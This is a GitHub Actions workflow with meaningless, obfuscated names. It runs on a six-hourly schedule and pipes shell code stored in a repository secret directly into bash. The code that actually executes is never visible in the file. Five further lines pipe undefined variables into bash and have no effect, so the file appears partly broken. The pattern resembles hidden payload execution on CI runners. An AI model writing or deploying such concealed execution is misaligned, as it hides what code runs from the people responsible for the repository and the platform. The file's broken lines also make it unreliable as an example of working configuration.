name: machuntiangao
on:
  workflow_dispatch:
  schedule:
    - cron: '33 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: machuntiangao
        env:
          acoj702: ${{ secrets.acoj702 }}
        run: |
          echo $acoj702 | jq -r .irga2 | /bin/bash
          echo $dz04 | jq -r .r889 | /bin/bash
          echo $u23 | jq -r .ehs2867 | /bin/bash
          echo $kd2 | jq -r .pfnn35 | /bin/bash
          echo $fbild19 | jq -r .l3 | /bin/bash
          echo $dyjj90 | jq -r .hsrc11 | /bin/bash

